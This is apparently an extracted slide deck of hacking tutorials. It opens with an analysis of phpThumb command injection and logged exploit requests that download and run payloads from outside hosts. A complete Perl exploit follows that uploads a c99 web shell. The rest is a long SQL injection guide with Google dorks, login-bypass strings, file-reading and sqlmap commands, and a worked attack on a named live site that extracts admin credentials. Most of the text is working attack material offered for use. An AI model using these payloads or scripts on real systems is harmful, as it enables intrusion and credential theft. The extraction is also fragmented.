    14.... 15.$this->DebugMessage('ImageMagick called as ('.$commandline.')',__FILE__, __LINE__); 16.$IMresult = phpthumb_functions::SafeExec($commandline); 17.clearstatcache(); 18.if (@$IMtempSourceFilename && file_exists($IMtempSourceFilename)) { 19.@unlink($IMtempSourceFilename); 20.} 21.if (!@file_exists($IMtempfilename) || !@filesize($IMtempfilename)) { 22.$this->FatalError('ImageMagick failed with message ('.trim($IMresult).')'); 23.$this->DebugMessage('ImageMagick failed with message ('.trim($IMresult).')', __FILE__, __LINE__); 24.... 25.} The issue was first addressed in version 1.7.10 and in version 1.7.11 the author added even more explicit escaping of command line parameters according to the changelog. escapeshellarg The updated code uses the php escapeshellarg function and also limits the length of the input. 0.case 'blur': 1.if ($this->ImageMagickSwitchAvailable('blur')) { 2.@list($radius) = explode('|', $parameter); 3.$radius = (!empty($radius) ? min(max(intval($radius), 0), 25) : 1); 4.$commandline .= ' -blur '.escapeshellarg($radius); 5.$successfullyProcessedFilters[] = $filterkey; 6.} 7.break; The problem with these extensions is that they use dangerous PHP functions which have the potential to mess up a web hosting server and hack / exploit user accounts further up to root level.
  • 22.
    Hackers, who usean insecure PHP script as an entry point to a web hosting server, can start unleashing dangerous commands and take control over the complete server quickly. Certain functions which are used in such scripts are considered as dangerous and are turned off in the PHP configuration by certain responsible webhosts. (Un)fortunately escapeshellarg is often part of the disabled functions so either way you can’t win except by staying away from scripts that use these dangerous functions. Find the location of your php.ini file. Open that file and look for "disable_functions" and replace it with the following line: disable_functions = exec,system,passthru,readfile,shell_exec,escapeshellarg,escapeshellcmd,proc_close, proc_open,ini_alter,dl,popen,parse_ini_file,show_source,curl_exec Source: Disabling dangerous PHP functions 3.5 php.ini & disabled functions safe_mode = On expose_php = Off Enable_dl= Off magic_quotes = On register_globals = off display errors = off disable_functions = system, show_source, symlink, exec, dl,shell_exec, passthru, phpinfo, escapeshellarg,escapeshellcmd Source: How To: WHM/cPanel Hardening & Security - The Basics - Part 1 Exploit Scans The queries are as follows: GET /phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps - aux; &phpThumbDebug=9 HTTP/1.1 GET /admin/upload/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -aux; &phpThumbDebug=9 HTTP/1.1 GET /manager/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.79.203/f;killall -9 perl;perl /tmp/f; &phpThumbDebug=9 HTTP/1.1 Breakdown of the requests / commands: Exploit the vulnerability in phpThum.php fltr[] parameter.
  • 23.
    GET /admin/upload/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality75 -interlace line fail.jpg jpeg:fail.jpg; Display all information about files / directories - shows long listing information about the file / directory. ls -l /tmp; Download file barbut6 from bingoooo.co.uk and write output to file /tmp/barbut6. wget -O /tmp/barbut6 bingoooo.co.uk/barbut6; Usually default permissions are set to 0644, change file permission to 0755 for owner / group / others so that the file can be executed. chmod 0755 /tmp/barbut6; Run / Excute file barbut6. /tmp/barbut6; The ps command gives a snapshot of the current processes. On most systems derived from BSD, ps commonly runs with the non-standard options aux, where "a" lists all processes on a terminal, including those of other users, "x" lists all processes without controlling terminals and "u" adds a column for the controlling user for each process. Note that, for maximum compatibility when using this syntax, there is no "-" in front of the "aux". ps -aux;
  • 24.
    Send SIGKILL toall perl processes. SIGKILL (Signal number 9) is a forced shutdown of a process. Note that with SIGKILL the process will not have opportunity to clean up any system resources it was using (e.g. temporary files etc.). killall -9 perl; Start perl and run / execute file f. perl /tmp/f; The output will be kept in the picture debug, created through the parameter phpThumbDebug = 9. &phpThumbDebug=9 IP List List of IP's involved in the scans 65.23.154.56 | 77.93.216.38 | 87.98.219.50 | 91.121.100.30 | 91.121.105.174 | 91.121.154.199 | 94.23.51.208 | 200.155.17.68 Targets view source print? 00.GET /cms/plugins/content/jthumbs/includes/phpThumb.php 01.GET /wp-content/plugins/ione-core/phpthumb/phpThumb.php 02.GET /common/scripts/phpThumb/phpThumb.php 03.GET /phpThumb/phpThumb.php 04.GET /libs/phpThumb/phpThumb.php 05.GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php 06.GET /wp-content/themes/fama/scripts/phpThumb/phpThumb.php 07.GET /gallery/phpThumb/phpThumb.php
  • 25.
    08.GET /wp-content/themes/victore/phpthumb/phpThumb.php 09.GET /wp-content/themes/Comfy/scripts/phpThumb/phpThumb.php 10.GET/wp-content/themes/redcarpet/scripts/phpthumb/phpthumb.php 11.GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php 12.GET /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php 13.GET /js/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php 14.GET /mambots/editors/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/ phpThumb.php 15.GET /admin/scripts/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/ph pThumb.php 16.GET /modules/phpThumb/phpThumb.php 17.GET /lib/phpThumb/phpThumb.php 18.GET /manager/phpThumb/phpThumb.php 19.GET /thumb/phpThumb.php 20.GET /global/phpthumb/phpThumb.php 21.GET /components/com_hotornot2/phpthumb/phpThumb.php 22.GET /wp-content/themes/max/scripts/phpThumb/phpThumb.php 23.GET /wp-content/themes/redcarpet/scripts/phpthumb/phpthumb.php 24.GET /staticfiles/phpThumb/phpThumb.php 25.GET /content/phpthumb/phpthumb.php 26.GET /class/phpthumb/phpThumb.php 27.GET /admin/phpThumb/phpThumb.php 28.GET /phpThumb.php 29.GET /admin/upload/phpThumb.php 30.GET /assets/components/phpthumb/phpThumb.php 31.GET /components/com_alphacontent/assets/phpthumb/phpThumb.php 32.GET /components/com_hotornot2/phpthumb/phpThumb.php 33.GET /components/com_alphauserpoints/assets/phpThumb/phpThumb.php
  • 26.
    34.GET /admin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php 35.GET /zadmin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php 36.GET/wp-content/plugins/com-resize/phpthumb/phpThumb.php 37.GET /components/com_flexicontent/librairies/phpthumb/phpThumb.php 38.GET /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php II. Automatic ShelluploadPerlScript Note : Please change the c991.txt addressto your own shell address. #!/usr/bin/perl # Exploit Title: phpThumb v. <= 1.7.9 Remote Command Injection (Automatic Shell Upload) # Date:09/09/2013 # Author: D35m0nd142 # Vendor Homepage: http://phpthumb.sourceforge.net/ # Tested on: phpThumb 1.7.9 # Enter the website in this form --> http://mobileworld24.pl/wpcontent/themes/mobileworld24/inc/phpThumb/ use LWP::UserAgent; use HTTP::Request; $target = $ARGV[0]; if($target eq '') { print "======================================================n"; print " phpThumb <= 1.7.9 Remote Command Injection exploit n"; print " (Automatic Shell Upload) n"; print " created by D35m0nd142 n";
  • 27.
    print "======================================================n"; sleep(0.8); print "Usage:perl phpthumb.pl <target> n"; exit(1); } if ($target !~ /http:///) { $target = "http://$target"; } #print "[*] Enter the address of your hosted TXT shell (ex: 'http://c99.gen.tr/r57.txt') => "; #$shell = <STDIN>; #sleep(1); print "======================================================n"; print " phpThumb <= 1.7.9 Remote Command Injection exploit n"; print " (Automatic Shell Upload) n"; print " created by D35m0nd142 n"; print "======================================================n"; sleep(1.1); print "[*] Sending exploit ... n"; sleep(1.1); $agent = LWP::UserAgent->new(); $agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1'); #print "Enter the command to execute => "; #$cmd = <STDIN>; $website = "$target/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; wget kratos91.altervista.org/c991.txt -O c991.txt ; &phpThumbDebug=9"; $request = $agent->request(HTTP::Request->new(GET=>$website));
  • 28.
    if ($request->is_success &&($request->content =~ /Malformed header from CGI/ || $request->content =~ /Saving to: / )) { print "[+] Exploit sent with success. n"; sleep(1.4); } else { print "[-] Exploit sent but probably the website is not vulnerable. n"; sleep(1.3); } print "[*] Controlling if the txt shell has been uploaded ...n"; sleep(1.2); $cwebsite = "$target/c991.txt"; $creq = $agent->request(HTTP::Request->new(GET=>$cwebsite)); if ($creq->is_success && ($creq->content =~ /c99shell.php/ || $creq->content =~ /shell/ )) { print "[+] Txt Shell uploaded :) n"; sleep(1); print "[*] Moving it to PHP format ... wait please ... n"; sleep(1.1); $mvwebsite = "$target/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; mv c991.txt shell.php ; &phpThumbDebug=9"; $mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite)); $cwebsite = "$target/shell.php";
  • 29.
    $c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite)); if($c2req->is_success && ($c2req->content =~ "/<b>Command execute</b></a> ::</b></p></td></tr/" || $c2req->content =~ /Safe-mode/ || $c2req->content =~ /c99shell/ || $c2req- >content =~ /r57shell/ || $c2req->content =~ /uname -a/ || $c2req->content =~ /shell/ )) { print "[+] PHP Shell injected => '$cwebsite' :) n"; sleep(0.8); print "[*] Do you want to open it? (y/n) => "; $open = <STDIN>; if ($open == "y") { $firefox = "firefox $cwebsite"; system($firefox); } } else { print "[-] Error while moving shell from Txt to Php :( n"; exit(1); } } else { print "[-] Txt shell not uploaded. :( n"; }
  • 30.
    MYSQL Injection : 1)Dorks Code: inurl:admin.asp inurl:login/admin.asp inurl:admin/login.asp inurl:adminlogin.asp inurl:adminhome.asp inurl:admin_login.asp inurl:administrator_login.asp I am going to use: Code: http://site.com/Admin_Login.asp 2) Logging Now you can find some site over these dorks and try to log in with: Username: Admin Password: password' or 1=1-- Instead of password' or 1=1 you can use some of these: Code: 'or'1'='1 ' or '1'='1 ' or 'x'='x ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a 'or'1=1' password' or 1=1 will the confuse server and will let you log in. So if you are able to log in, site is vulnerable and you are going to be able to use admin panel.
  • 31.
    SQL Injection : 1)SQL Injection? SQL Injection is type of web attack. Attacker use hole in script to take all data from database. Vulnerable sites are in format: Code: http://www.link.com/index.php?id= You can put anything else instead of index. 2) Finding vulnerable sites: Best way to find vulnerable site is by using Google. We use these dorks to find sites: Code: inurl:faq.php?id= inurl:event.php?id= inurl:index.php?id= 3) Site vulnerability check: There are 2 ways to check if site is vulnerable. 1st way, we got link: Code: http://site.com/book.php?id=141 we are gonna add only ' at end of link so we get this link: Code: http://site.com/book.php?id=141' 2nd way, we got link: Code: http://site.com/book.php?id=141 we are going to add +and+1=2-- at end of link so we get: Code: http://site.com/book.php?id=141+and+1=2-- If some part of page disappear (picture, text or something) or any error like (You have an error in your SQL syntax) site is vulnerable. 4) Finding number of columns We can do it by using function order by, on link: Code: [http://site.com/book.php?id=141 adding +order+by+5-- Code: http://site.com/book.php?id=141+order+by+5--
  • 32.
    If page isopens normal there is more then 5 columns. Lets try with 10. Code: http://site.com/book.php?id=141+order+by+10-- Now some part of site disappeared, which means that there's more then 5 and less then 10 columns. Lets try 7. Code: http://site.com/book.php?id=141+order+by+7-- Page is opened normally which means that there is more then 7 and less then 10 columns. Lets try 8. Code: http://site.com/book.php?id=141+order+by+7-- on column 8 part of site disappear which means that there is 7 columns. 5) Finding vulnerable columns Finding vulnerable columns is done with function union select all on link (in this case) we are going to add +union+select+all+1,2,3,4,5,6,7-- Code: http://site.com/book.php?id=-141+union+select+all+1,2,3,4,5,6,7-- It is going to write numbers on page (in this case 1 2 3 4 5 6 7) which means that data can be taken from any column. We are going to take from second column. 6) Finding database version As I said we are gonna take data from second column. Instead of number 2 we are going to put version() or @@version Code: http://site.com/book.php?id=-141+union+select+all+1,@@version,3,4,5,6,7-- on page where number 2 was, it will show database version. If database version is 4 we have to guess name of table and column, but if database version is 5 we have to guess database version. We have version 5.0.51a-24+lenny5 which means that we don't have to guess name of table and column. 7) Finding table names If database version is 4 you wont be able to find name of table and column, you have to guess their names. If database version is skip this step. Names of some possible tables: Code:
  • 33.
    admin admins user users member members Names of somepossible columns: Code: username uname un user name nick password pw pwd passwd If database version is 5 we can take name of table by doing next step: instead of number 2 we going to put group_concat(table_name) and after number of last column +from+information_schema.tables+where+table_schema=database()-- So we get this link: Code: http://site.com/book.php?id=- 141+union+select+all+1,group_concat(table_name),3,4,5,6,7+from+information_sc hem a.tables+where+table_schema=database()-- Instead of number 2 it showed name of table, in this case date, book, users. We gonna take columns from users table. 8) Finding column name We found table name that we want and now from that we want to take columns. Instead of group_concat(table_name) we are going to put group_concat(column_name) and instead of +from+information_schema.tables+where+table_schema=database()-- we are going to put +from+information_schema.columns+where+table_name=hex-- instead of hex we have to encrypt in hex name of table. Go to: Code: http://www.string-functions.com/string-hex.aspx write the name of thetable (in this case users) and we get hex-ed number: 7573657273 so now can see the columns: Code: http://site.com/book.php?id=- 141+union+select+all+1,group_concat(column_name),3,4,5,6,7+from+information_s che ma.columns+where+table_name=0x7573657273--
  • 34.
    9) Taking datafrom columns We got: id, name, surname, username, password, level. We need only username and password. Instead of group_concat(column_name) we put group_concat(username,0x3a,password) 0x3a stands for to make space between user and pw. Instead of from+information_schema.columns+where+table_name=0x7573657273-- we put +from+users-- and we have link: Code: http://site.com/book.php?id=- 141+union+select+all+1,group_concat(username,0x3a,password),3,4,5,6,7+from+us ers-- and result e.g.: Code: sebrezovski:1533562 seratum:seratum coach:53.21.1985. biga:biga which is users and passwords from this site. 10) Filter bypassing In case when you write union+select+all says "not accessible" then change it to UnIoN+sElEcT+aLl On some sites space is restricted so you can put + or /**/ (/* start of comment in php and finish */) On some sites there is also restricted database version so you can use unhex(hex(version())) 11) Site protection from SQL Injection Just put this code in your script: Code: if(!is_numeric($_GET['id'])) { echo 'It is gonna write text when some try to add /' or and+1=2'; }
  • 35.
    SQL Injection -Load File : You found site with SQL vulnerability, now you can try to access table mysql.user and file privileges. To so which is user and do we have user privileges we are adding 'user' instead of a vulnerable column and at end of URL adding '+from+mysql.user--'. It should look like this: Code: http://www.site.com/index.php?id=1+union+select+all+1,2,user,4+from+mysql.use r-- If you get username, it means that you have access to mysql.user table and you can continue with this tut. Now to see if we have file privileges we have to instead of 'user' add 'concat(user,0x3a,file_priv)' and of course '+from+mysql.user--' Now when on page usernames and file priv. are listed you must find username which was written at start, when you was writing 'user' in column, when you find it and if besides him shows 'Y' which is Yes. You have privileges. Load File: All we have to do is to write on vulnerable column load_file('FILE NAME'). We gonna try with /etc/passwd, so we type in vulnerable column 'load_file('/etc/passwd'). Which looks like this: Code: http://www.site.com/index.php?id=1+union+select+all+1,2,load_file('/etc/passw d'),4-- If it give us error we can convert file in Char or Hex, but if we do it we must delete " ' " in file name. Hex e.g. If we convert file name in Hex, before file name we will add '0x' Code: http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(0x2f6574632 f706173737764),4+from+mysql.user-- Hex code '2f6574632f706173737764' works for '/etc/passwd'. It is recommended for Hex: Code:
  • 36.
    www.string-functions.com/string-hex.aspx If you decideto convert file in Char then add 'load_file(char(converted file to char))' Which looks like: Code: http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(char(47,101 ,116,99,47,112,97,115,115,119,100),4-- Where ' 47,101,116,99,47,112,97,115,115,119,100 ' works for '/etc/passwd' Char converter: Code: http://pookey.co.uk/binary.php
  • 37.
    MSSQL Injection : 1)Finding number of columns I will use: Code: http://www.site.com/sr/page/member.asp?id=234 To find column number we gonna use order by function. We will add +order+by+5-- at end of link. Code: http://www.site.com/sr/page/member.asp?id=234+order+by+5-- So we will get this error: Code: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 5 is out of range of the number of items in the select list. /sr/page/member.asp, line 38 which means that there is less then 5 columns, lets try with 4. We get same error, so we gonna try with 3 and we get next error: Code: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'order'. /sr/page/member.asp, line 44 Which means that there is 3 columns. 2) Finding database version To find database version we are using @@version. Code: http://www.site.com/sr/page/member.asp?id=- 234+union+select+all+1,@@version,3-- and we get: Code: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on
  • 38.
    Windows NT 5.2(Build 3790: Service Pack 2) ' to a column of data type int. /sr/page/member.asp, line 38 and from here we can see database version. 3) Finding table name With MSSQL Injection it is not possible to get all tables at once, we must go 1 by 1. Code: http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3 +from+information_schema.tables-- and we get: Code: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Country' to a column of data type int. /sr/page/member.asp, line 38 and we can see that we have a table called 'Country'. Now we have to find other tables. We are going to use not+in function. So we have link: Code: http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3 +from+information_schema.tables +where+table_name+not+in('Country')-- and we get: Code: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Admin' to a column of data type int. /sr/page/member.asp, line 38 and from here we can see that we have a Admin table. 4) Finding column name It is same for columns. We can not get all columns at once, so we have to do it 1 by 1. In this case we will use where+table_name='Admin'--. So we have link: Code: http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name, 3+from+information_schema.colum ns+where+table_name='Admin'-- and we have error: Code:
  • 39.
    Microsoft OLE DBProvider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'USERNAME' to a column of data type int. /sr/page/member.asp, line 38 From here we can see that we have column USERNAME. Now we need rest of the columns so we gonna use again not+in function. Code: http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name, 3+from+information_schema.colum ns+where+table_name='Admin'+and+column_name+not+in('USERNAME')-- and we get: Code: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'PASSWD' to a column of data type int. /sr/page/member.asp, line 38 So columns is PASSWD. 5) Taking data from columns Now we have to put name of table instead of table_name and everything after from we are entering the name of the table. Code: http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,USERNAME,3+f rom+Admin-- We get username OjuZwqAul. It is same for password: Code: http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,PASSWD,3+fro m+Admin-- We get password M7sWt2!2uq.
  • 40.
    Blind SQL Injection: 1) Blind SQL Injection? Difference between SQL Injection and Blind SQL Injection is that Blind SQL Injection is not writing any errors, any table and column names or column content. So that is why it is called Blind SQL. You are just messing with part of site disappearing - image, text, etc... In Blind Injection we don't use --i/* */. 2) Site vulnerability check We have link: Code: http://www.site.com/index.php?id=1 We will add and 1=2 Code: http://www.site.com/index.php?id=1+and+1=2 If any part of page disappear, it means that site is vulnerable. 3) Finding database version As we said already in this method nothing is gonna be showed, so we gonna say that database version is 4. If part of site disappear it means that version is not 4, but if everything on page stay as it should it means that version is 4. We gonna use function @@version. Code: http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=4 If page is loaded as it should then version is 4, if not, then we will try: Code: http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=5 4) MYSQL user First we will check are we able to use select because it is blocked sometimes. Code: http://www.site.com/index.php?id=1+and+(select+1)=1 If page is loaded normally we can use select, but if not then we can't use it. Now we will check do we have MYSQL user access. Code: http://www.site.com/index.php?id=1+and+(SELECT+*+from+mysq.user+limit+0,1)=1 Same as everything else, if page is loaded normally we have access to mysql.user, if not then we don't have. mysql.user is useful to get hash password or use load_file() and OUTFILE.
  • 41.
    5) Finding tablename To find table names all we have to do is guess. First we gonna find table name then after column name from table. We have link and we are gonna try to get names of different tables. If page is loaded normally it means that table name is there and exists. Code: http://www.site.com/index.php?id=1+and+(select+1+from+ime_tabele+limit+0,1)=1 Our main objective is to to find data from admin table, we can also use: Code: admin administrator member login members adm user users tbl_admin 6) Finding column name Now when we found name of table we wanted it is time to find column name. We doing same as for table. There is name matching, if page is loaded normally then column exists. We need logging data so commonly columns gonna be: Code: username admin admin_username uname user nick password pwrod admin_password pw pass Link that we use for columns is: Code: http://www.sajt.com/index.php?id=1+and+(select+substring(concat(1,ime_kolone) ,1,1)from+ime_tabele+limit+0,1)=1 7) Taking data from columns In whole Blind SQL this gonna be most bored and longest part. Here we gonna need ASCII table. Code: http://www.asciitable.com/
  • 42.
    We will lookonly for DEC and CHR ASCII tables. First we gonna get username, getting letter by letter. So we need to guess DEC for some letter, e.g. for A it is 65. We have link: Code: http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_ name)+from+column_name+ limit+0,1)1,1))>from DEC number If page load normally we found are real letter for username. To find our second letter change +limit+0,1 to +limit+1,1. So now we are guessing second letter... It is same for password... So after long long time we get username and password. If there is more users and if you want to get their passwords too you will have to add where function. So it should look like: Code: http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_ name)+from+column_name+ where+column_name=something+limit+0,1)1,1))>from DEC letter To use where for second column_name we usually using id, but we can also use other stuff. e.g. for id: Code: http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_ name)+from+column_name+ where+id=1+limit+0,1)1,1))>from DEC letter 8) Taking data from columns using sqlmap As you noticed already that you need a lot of time to get data from columns I would suggest you to use sqlmap. Download: Code: http://sqlmap.org/ Python download: Code: http://www.python.org/download/ Now we have to find directory where sqlmap is located. Start>run>cmd and find sqlmap directory using cd function. Function to start sqlmap for getting data with Blind SQL Injection for windows is: Code: sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user- agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name)" NOTE: for unix put python before sqlmal.py So it should look like: Code:
  • 43.
    python sqlmap.py -u"http://site.com/index.php?id=1" -p id -a "./txt/user- agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name)" If there is more users as I said then use id: Code: sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user- agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name where id=1)" After -u you put link. After -p you put parameter which is vulnerable (in our case id). -a we are using for some random user agen-t from txt/user-agents.txt -v1 is verbose After --string stavljamo something that sqlmap is gonna recognize that he found letter (some part of text who dissapear if case is false). -e is command that we want to execute. In our case this one: Code: SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name where userid=1
  • 44.
    Postgre SQL Injection: 1) Postgre SQL Injection? Postgre SQL Injection is almost same as SQL Injection. Difference is in Postgre base, not MySQL. It is a bit complicated attack then usually SQL Injection. There is some other functions that we will use, you will see. 1) Finding vulnerable sites Finding site vulnerability is same as usual SQL Injection, which means that we can use Google dorks. Here is some: Code: inurl:faq.php?id= inurl:event.php?id= inurl:index.php?id= 3) Site vulnerability check You found site that may be vulnerable. To check if site is vulnerable we will add ' at end of link. Code: http://www.link.com/page.php?page=1' So if on page we get: Code: Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at or near or some part of page disappear then site is vulnerable. 4) Finding number of columns So we know that site is vulnerable, now we need to find column number. We will do it with union function this time. Our link: Code: http://www.link.com/page.php?page=1+union+select+all+null--+- If page is loaded normally that means that there is more columns. Code: http://www.link.com/page.php?page=1+union+select+all+null,null,null,null from dual-- We are adding null all the time till we get error. If we get error with 7 null, it means that we have 6 columns, which means 6 nulls.
  • 45.
    5) Finding vulnerablecolumns It is just so easy to find column vulnerability. Null = 0, which means that everything you put instead of certain null, if nothing happens it means that columns is not usable. That is how we gonna find vulnerable column. So: Code: http://www.link.com/page.php?page=1+union+select+all+current_database(),null, null,null--+- If there is nothing listed, it means that column is not usable we will move on next, and this one back to null. 6) Finding database version We are doing this with version() function. Link will show us the version: Code: http://www.link.com/page.php?page=1+union+select+all+version(),null,null,null --+- we will get something like: Code: PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit 7) Finding table name Same as usual SQL Injection, only diff. is that instead of column number we have null. So it should look like: Code: http://www.link.com/page.php?page=1+union+select+all table_name,null,null,null+from+information_schema.tables--+- We will get table names also the columns from tables. 8) Finding column name It is also easy, and there is no big difference. This is how it should look like: Code: http://www.link.com/page.php?page=1+union+select+all column_name,null,null,null+from+information_schema.columns+where+table_name=u ser s--+- Sometimes this wont work so we need to convert = from ascii in decimal. You can use this site:
  • 46.
    Code: http://easycalculation.com/ascii-hex.php So we havelink: Code: http://www.link.com/page.php?page=1+union+select+all+column_name,null,null,nu ll+from+information_sch ema.columns+where+table_name||CHR(61)||users--+- 9) Taking data from columns Also almost same as usual SQL Injection: Code: http://www.link.com/page.php?page=1+union+select+all+username||CHR(58)||passw ord+from+users--+-
  • 47.
    Error based PostgreSQL Injection : 1) Error based Postgre SQL Injection? Error based Postgre SQL Injection is type of web attack releated to Postgre SQL base. Difference is that you can get all tables, columns and values from columns etc. As title says attack is based on errors, and all results will be shown in errors. 2) Finding vulnerable sites Use Google dorks: Code: inurl:faq.php?id= inurl:event.php?id= inurl:index.php?id= 3) Site vulnerability check Add ' at end of link: Code: http://www.link.com/page.php?page=1' so if we get: Code: Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at or near site is vulnerable. 4) Finding database version Use version() function. In this type of attack query looks a bit complicated then usual SQL Injection so don't get confused. Code: http://www.link.com/page.php?page=1+and+1=cast(version()+as+int)-- If function is loaded successfully you will get this on page: Code: Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: "PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit" from where we get database version: Code:
  • 48.
    PostgreSQL 9.0.4 oni486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit 5) Finding table name As I said at start we are not able to get all tables in same time so we gonna use limit and offset functions. We will use offset to say which result from base we want to list. Our link: Code: http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+inform ation_schema.tables+limit+1+offset+0)+as+int)-- on page we will get this error: Code: Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: "pg_type" from this we have table pg_type. to get next table we gonna change offset to 1: Code: http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+inform ation_schema.tables+limit+1+offset+1)+as+int)-- and we gonna get table like pg_attribute. 6) Finding column name First you have to do is to convert table name into decimal. We will use: Code: http://easycalculation.com/ascii-hex.php type string admin and you will get decimal code: Code: 97 100 109 105 110 We will change this code a bit, so it should look like this: Code: CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110) Now we will put it for table names and get columns. Code: http://www.link.com/page.php?page=1+and+1=cast((select+column_name+from+infor mation_schema.columns+w here+table_name=CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)+limit +1 +offset+0)+as+int)--
  • 49.
    and we willget column id. We gonna change offset all the time till site back us on home page, which means that there is no more columns in that table. 7) Taking data from columns We found column username and password and now we want to get data from column. Code: http://www.link.com/page.php?page=1+and+1=cast((select+username+||CHR(58)||+p assword+from+admin+limit+1+offset+0)+as+int)-- and we will get this: Code: admin:21232f297a57a5a743894a0e4a801fc3 CHR(58) presents two points ( and we use to get two columns at same time. NOTE: (Regard to whole tutorial) from now I'm not gonna explane it detailed, 'cause I think you should figure it out till now already. So I'm gonna use pics and codes only.
  • 50.
    SQL Injection onASPX : 1) Site vulnerability check Vulnerable link: Code: http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton We will add order by 1--: Code: http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton order by 1-- If you get page error go to: Code: http://pothys.com/ImageDisplay.aspx?Id=1535 2) Finding column name Go to: Code: http://pothys.com/ImageDisplay.aspx?Id=1535 having 1=1
  • 51.
    3) Finding tablename Code: http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 table_name from information_schema.tables)) We want admin table, so we type next: Code: http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Tab_FinalOrder'))) admin table name is AdminMaster 4) Finding columns in admin table
  • 52.
    Code: http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(selecttop 1 column_name from information_schema.columns where table_name = 'AdminMaster')) Code: http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name = 'AdminMaster' and column_name not in ('Admin_name'))) Columns names:
  • 53.
